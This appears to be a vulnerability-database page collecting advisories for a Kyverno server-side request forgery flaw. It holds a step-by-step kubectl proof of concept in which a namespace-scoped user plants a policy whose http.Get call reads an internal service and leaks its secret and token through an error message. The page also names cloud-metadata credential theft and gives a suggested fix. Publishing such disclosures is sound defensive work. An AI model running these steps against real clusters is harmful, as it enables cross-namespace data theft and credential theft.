This is a different code path from previously reported issues: - GHSA-8p9x-46gm-qfx2: pkg/engine/apicall/apiCall.go (URLPath) - Fixed - GHSA-459x-q9hg-4gpq: pkg/engine/apicall/executor.go (Service.URL) - Different feature (apiCall vs CEL http) - This issue: pkg/cel/libs/http/http.go (CEL http.Get/http.Post) - Not fixed

PoC

Tested on Kyverno v1.16.2 (Chart 3.6.2) on Kubernetes v1.35.0 (kind).

A complete automated PoC script is attached. Manual steps below:

1. Setup attacker with namespace-scoped permissions

kubectl create namespace attacker-ns
kubectl create serviceaccount namespace-admin -n attacker-ns

cat <<EOF | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: namespace-admin-role
  namespace: attacker-ns
rules:
  - apiGroups: [""]
    resources: ["configmaps"]
    verbs: ["create", "get", "list"]
  - apiGroups: ["policies.kyverno.io"]
    resources: ["namespacedvalidatingpolicies"]
    verbs: ["create", "get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: namespace-admin-binding
  namespace: attacker-ns
subjects:
  - kind: ServiceAccount
    name: namespace-admin
    namespace: attacker-ns
roleRef:
  kind: Role
  name: namespace-admin-role
  apiGroup: rbac.authorization.k8s.io
EOF

2. Create sensitive internal service (simulating internal API or cloud metadata)

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: internal-api
  namespace: kube-system
  labels:
    app: internal-api
spec:
  containers:
  - name: server
    image: hashicorp/http-echo
    args:
      - "-text={\"secret\": \"STOLEN_INTERNAL_SECRET_12345\", \"token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\"}"
      - "-listen=:8080"
---
apiVersion: v1
kind: Service
metadata:
  name: internal-api
  namespace: kube-system
spec:
  selector:
    app: internal-api
  ports:
  - port: 80
    targetPort: 8080
EOF

3. Verify attacker cannot access kube-system directly

kubectl auth can-i get pods -n kube-system --as=system:serviceaccount:attacker-ns:namespace-admin
# Output: no

4. Create malicious NamespacedValidatingPolicy (as attacker)

cat <<EOF | kubectl apply --as=system:serviceaccount:attacker-ns:namespace-admin -f -
apiVersion: policies.kyverno.io/v1beta1
kind: NamespacedValidatingPolicy
metadata:
  name: cel-ssrf-poc
  namespace: attacker-ns
spec:
  matchConstraints:
    resourceRules:
      - apiGroups: [""]
        apiVersions: ["v1"]
        operations: ["CREATE"]
        resources: ["configmaps"]
  variables:
    - name: stolenData
      expression: |
        http.Get('http://internal-api.kube-system.svc.cluster.local')
  validations:
    - expression: "false"
      message: "Validation failed"
      messageExpression: |
        'SSRF_LEAKED: secret=' + variables.stolenData['secret'] + ' token=' + variables.stolenData['token']
EOF

5. Trigger exploit and exfiltrate data

kubectl create configmap trigger --from-literal=x=y -n attacker-ns \
  --as=system:serviceaccount:attacker-ns:namespace-admin

6. Result - Secret data exfiltrated

error: failed to create configmap: admission webhook "nvpol.validate.kyverno.svc-fail" 
denied the request: Policy cel-ssrf-poc failed: 
SSRF_LEAKED: secret=STOLEN_INTERNAL_SECRET_12345 token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9

Impact

Cross-namespace data access: Users with only namespace-scoped permissions can access services in any namespace
Cloud credential theft: Access to http://169.254.169.254/... allows stealing AWS/GCP/Azure IAM credentials
Data exfiltration: HTTP response data exposed via validation error messages or audit annotations
Breaks namespace isolation: Inconsistent with Kyverno's security model where resource.Lib enforces namespace boundaries

Affected Policies

All CEL-based namespaced policies in policies.kyverno.io API group: - NamespacedValidatingPolicy - NamespacedMutatingPolicy - NamespacedDeletingPolicy - NamespacedImageValidatingPolicy

Suggested Fix

Add namespace and URL restrictions to pkg/cel/libs/http/http.go, similar to how resource.Lib enforces namespace boundaries:

type lib struct {
    namespace string  // Add namespace parameter
    version   *version.Version
}

func (r *contextImpl) Get(url string, headers map[string]string) (any, error) {
    if err := r.validateURL(url); err != nil {
        return nil, fmt.Errorf("blocked URL: %w", err)
    }
    // ... existing code
}

func (r *contextImpl) validateURL(urlStr string) error {
    // Block cloud metadata (169.254.0.0/16)
    // Block localhost/loopback (127.0.0.0/8)
    // For namespaced policies: restrict to same namespace services only
}

Attached kyverno-cel-ssrf-poc.sh

Credit

Discovered by: Igor Stepansky Organization: Orca Security Email: igor.stepansky@orca.security Personal Email: stepanskyigor@gmail.com

Severity ?

8.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/kyverno/kyverno"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.16.0"
            },
            {
              "fixed": "1.17.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-4789"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T22:37:20Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability in Kyverno\u0027s CEL HTTP library (`pkg/cel/libs/http/`) allows users with namespace-scoped policy creation permissions to make arbitrary HTTP requests from the Kyverno admission controller. This enables unauthorized access to internal services in other namespaces, cloud metadata endpoints (169.254.169.254), and data exfiltration via policy error messages.\n\n## Affected Versions\n\n- Kyverno \u003e= 1.16.0 (with `policies.kyverno.io` CRDs enabled, which is the default)\n- Tested on: Kyverno v1.16.2 (Helm chart 3.6.2)\n\n## Details\n\nThe `http.Get()` and `http.Post()` functions available in CEL-based policies (`policies.kyverno.io` API group) do not enforce any URL restrictions. Unlike `resource.Lib` which enforces namespace boundaries for namespaced policies, the `http.Lib` allows unrestricted access to any URL.\n\n**Vulnerable Code:** `pkg/cel/libs/http/http.go`\n```go\nfunc (r *contextImpl) Get(url string, headers map[string]string) (any, error) {\n    req, err := http.NewRequestWithContext(context.TODO(), \"GET\", url, nil)\n    // NO URL VALIDATION - no blocklist, no namespace restrictions\n    ...\n}\n```\n\n**Contrast with resource.Lib** which enforces namespace:\n```go\n// pkg/cel/libs/resource/lib.go\nfunc Lib(namespace string, v *version.Version) cel.EnvOption {\n    return cel.Lib(\u0026lib{namespace: namespace, version: v})  // Namespace enforced\n}\n```\n\nThis is a **different code path** from previously reported issues:\n- GHSA-8p9x-46gm-qfx2: `pkg/engine/apicall/apiCall.go` (URLPath) - Fixed\n- GHSA-459x-q9hg-4gpq: `pkg/engine/apicall/executor.go` (Service.URL) - Different feature (apiCall vs CEL http)\n- **This issue**: `pkg/cel/libs/http/http.go` (CEL http.Get/http.Post) - **Not fixed**\n\n## PoC\n\nTested on Kyverno v1.16.2 (Chart 3.6.2) on Kubernetes v1.35.0 (kind).\n\nA complete automated PoC script is attached. Manual steps below:\n\n### 1. Setup attacker with namespace-scoped permissions\n```bash\nkubectl create namespace attacker-ns\nkubectl create serviceaccount namespace-admin -n attacker-ns\n\ncat \u003c\u003cEOF | kubectl apply -f -\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n  name: namespace-admin-role\n  namespace: attacker-ns\nrules:\n  - apiGroups: [\"\"]\n    resources: [\"configmaps\"]\n    verbs: [\"create\", \"get\", \"list\"]\n  - apiGroups: [\"policies.kyverno.io\"]\n    resources: [\"namespacedvalidatingpolicies\"]\n    verbs: [\"create\", \"get\", \"list\"]\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n  name: namespace-admin-binding\n  namespace: attacker-ns\nsubjects:\n  - kind: ServiceAccount\n    name: namespace-admin\n    namespace: attacker-ns\nroleRef:\n  kind: Role\n  name: namespace-admin-role\n  apiGroup: rbac.authorization.k8s.io\nEOF\n```\n\n### 2. Create sensitive internal service (simulating internal API or cloud metadata)\n```bash\ncat \u003c\u003cEOF | kubectl apply -f -\napiVersion: v1\nkind: Pod\nmetadata:\n  name: internal-api\n  namespace: kube-system\n  labels:\n    app: internal-api\nspec:\n  containers:\n  - name: server\n    image: hashicorp/http-echo\n    args:\n      - \"-text={\\\"secret\\\": \\\"STOLEN_INTERNAL_SECRET_12345\\\", \\\"token\\\": \\\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\\\"}\"\n      - \"-listen=:8080\"\n---\napiVersion: v1\nkind: Service\nmetadata:\n  name: internal-api\n  namespace: kube-system\nspec:\n  selector:\n    app: internal-api\n  ports:\n  - port: 80\n    targetPort: 8080\nEOF\n```\n\n### 3. Verify attacker cannot access kube-system directly\n```bash\nkubectl auth can-i get pods -n kube-system --as=system:serviceaccount:attacker-ns:namespace-admin\n# Output: no\n```\n\n### 4. Create malicious NamespacedValidatingPolicy (as attacker)\n```bash\ncat \u003c\u003cEOF | kubectl apply --as=system:serviceaccount:attacker-ns:namespace-admin -f -\napiVersion: policies.kyverno.io/v1beta1\nkind: NamespacedValidatingPolicy\nmetadata:\n  name: cel-ssrf-poc\n  namespace: attacker-ns\nspec:\n  matchConstraints:\n    resourceRules:\n      - apiGroups: [\"\"]\n        apiVersions: [\"v1\"]\n        operations: [\"CREATE\"]\n        resources: [\"configmaps\"]\n  variables:\n    - name: stolenData\n      expression: |\n        http.Get(\u0027http://internal-api.kube-system.svc.cluster.local\u0027)\n  validations:\n    - expression: \"false\"\n      message: \"Validation failed\"\n      messageExpression: |\n        \u0027SSRF_LEAKED: secret=\u0027 + variables.stolenData[\u0027secret\u0027] + \u0027 token=\u0027 + variables.stolenData[\u0027token\u0027]\nEOF\n```\n\n### 5. Trigger exploit and exfiltrate data\n```bash\nkubectl create configmap trigger --from-literal=x=y -n attacker-ns \\\n  --as=system:serviceaccount:attacker-ns:namespace-admin\n```\n\n### 6. Result - Secret data exfiltrated\n```\nerror: failed to create configmap: admission webhook \"nvpol.validate.kyverno.svc-fail\" \ndenied the request: Policy cel-ssrf-poc failed: \nSSRF_LEAKED: secret=STOLEN_INTERNAL_SECRET_12345 token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\n```\n\n## Impact\n\n1. **Cross-namespace data access**: Users with only namespace-scoped permissions can access services in any namespace\n2. **Cloud credential theft**: Access to `http://169.254.169.254/...` allows stealing AWS/GCP/Azure IAM credentials\n3. **Data exfiltration**: HTTP response data exposed via validation error messages or audit annotations\n4. **Breaks namespace isolation**: Inconsistent with Kyverno\u0027s security model where `resource.Lib` enforces namespace boundaries\n\n## Affected Policies\n\nAll CEL-based namespaced policies in `policies.kyverno.io` API group:\n- `NamespacedValidatingPolicy`\n- `NamespacedMutatingPolicy` \n- `NamespacedDeletingPolicy`\n- `NamespacedImageValidatingPolicy`\n\n## Suggested Fix\n\nAdd namespace and URL restrictions to `pkg/cel/libs/http/http.go`, similar to how `resource.Lib` enforces namespace boundaries:\n```go\ntype lib struct {\n    namespace string  // Add namespace parameter\n    version   *version.Version\n}\n\nfunc (r *contextImpl) Get(url string, headers map[string]string) (any, error) {\n    if err := r.validateURL(url); err != nil {\n        return nil, fmt.Errorf(\"blocked URL: %w\", err)\n    }\n    // ... existing code\n}\n\nfunc (r *contextImpl) validateURL(urlStr string) error {\n    // Block cloud metadata (169.254.0.0/16)\n    // Block localhost/loopback (127.0.0.0/8)\n    // For namespaced policies: restrict to same namespace services only\n}\n```\n\nAttached \n[kyverno-cel-ssrf-poc.sh](https://github.com/user-attachments/files/24940825/kyverno-cel-ssrf-poc.sh)\n\n\n## Credit\n\nDiscovered by: Igor Stepansky\nOrganization: Orca Security\nEmail: igor.stepansky@orca.security\nPersonal Email: stepanskyigor@gmail.com",
  "id": "GHSA-rggm-jjmc-3394",
  "modified": "2026-04-14T22:37:20Z",
  "published": "2026-04-14T22:37:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-rggm-jjmc-3394"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4789"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/kyverno/pull/15729"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kyverno/kyverno"
    },
    {
      "type": "WEB",
      "url": "https://www.kb.cert.org/vuls/id/655822"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Kyverno has SSRF via CEL http.Get/http.Post in NamespacedValidatingPolicy allows cross-namespace data access"
}

GHSA-QQRV-2HCH-83Q4

Vulnerability from github – Published: 2026-03-30 21:31 – Updated: 2026-04-14 22:36

Summary

Duplicate Advisory: Kyverno is vulnerable to server-side request forgery (SSRF)

Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-rggm-jjmc-3394. This link is maintained to preserve external references.

Original Description

Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.

Severity ?

5.3 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/kyverno/kyverno"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.16.0"
            },
            {
              "last_affected": "1.17.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T23:07:50Z",
    "nvd_published_at": "2026-03-30T21:17:10Z",
    "severity": "MODERATE"
  },
  "details": "## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-rggm-jjmc-3394. This link is maintained to preserve external references.\n\n## Original Description\nKyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.",
  "id": "GHSA-qqrv-2hch-83q4",
  "modified": "2026-04-14T22:36:54Z",
  "published": "2026-03-30T21:31:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4789"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/kyverno/pull/15729"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kyverno/kyverno"
    },
    {
      "type": "WEB",
      "url": "https://kb.cert.org/vuls/id/655822"
    },
    {
      "type": "WEB",
      "url": "https://portswigger.net/web-security/ssrf"
    },
    {
      "type": "WEB",
      "url": "https://www.kb.cert.org/vuls/id/655822"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Duplicate Advisory: Kyverno is vulnerable to server-side request forgery (SSRF)",
  "withdrawn": "2026-04-14T22:36:54Z"
}

FKIE_CVE-2026-4789

Vulnerability from fkie_nvd - Published: 2026-03-30 21:17 - Updated: 2026-04-03 18:17

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.

References

URL	Tags
cret@cert.org	https://github.com/kyverno/kyverno	Product
cret@cert.org	https://kb.cert.org/vuls/id/655822	Third Party Advisory
cret@cert.org	https://portswigger.net/web-security/ssrf	Technical Description
af854a3a-2127-422b-91ae-364da2661108	https://www.kb.cert.org/vuls/id/655822	Third Party Advisory

Impacted products

	Vendor	Product	Version
	kyverno	kyverno	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F2E0715F-61DE-45F5-840E-06CF5C468D33",
              "versionEndIncluding": "1.17.1",
              "versionStartIncluding": "1.16.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions."
    },
    {
      "lang": "es",
      "value": "Kyverno, versiones 1.16.0 y posteriores, son vulnerables a SSRF debido a funciones HTTP CEL sin restricciones."
    }
  ],
  "id": "CVE-2026-4789",
  "lastModified": "2026-04-03T18:17:51.837",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-30T21:17:10.843",
  "references": [
    {
      "source": "cret@cert.org",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/kyverno/kyverno"
    },
    {
      "source": "cret@cert.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://kb.cert.org/vuls/id/655822"
    },
    {
      "source": "cret@cert.org",
      "tags": [
        "Technical Description"
      ],
      "url": "https://portswigger.net/web-security/ssrf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.kb.cert.org/vuls/id/655822"
    }
  ],
  "sourceIdentifier": "cret@cert.org",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-4789 (GCVE-0-2026-4789)

OPENSUSE-SU-2026:10613-1

bit-kyverno-2026-4789

Vulnerability from bitnami_vulndb

GHSA-RGGM-JJMC-3394

Summary

Affected Versions

Details

PoC

1. Setup attacker with namespace-scoped permissions

2. Create sensitive internal service (simulating internal API or cloud metadata)

3. Verify attacker cannot access kube-system directly

4. Create malicious NamespacedValidatingPolicy (as attacker)

5. Trigger exploit and exfiltrate data

6. Result - Secret data exfiltrated

Impact

Affected Policies

Suggested Fix

Credit

GHSA-QQRV-2HCH-83Q4

Duplicate Advisory

Original Description

FKIE_CVE-2026-4789

Tags

Sightings

Nomenclature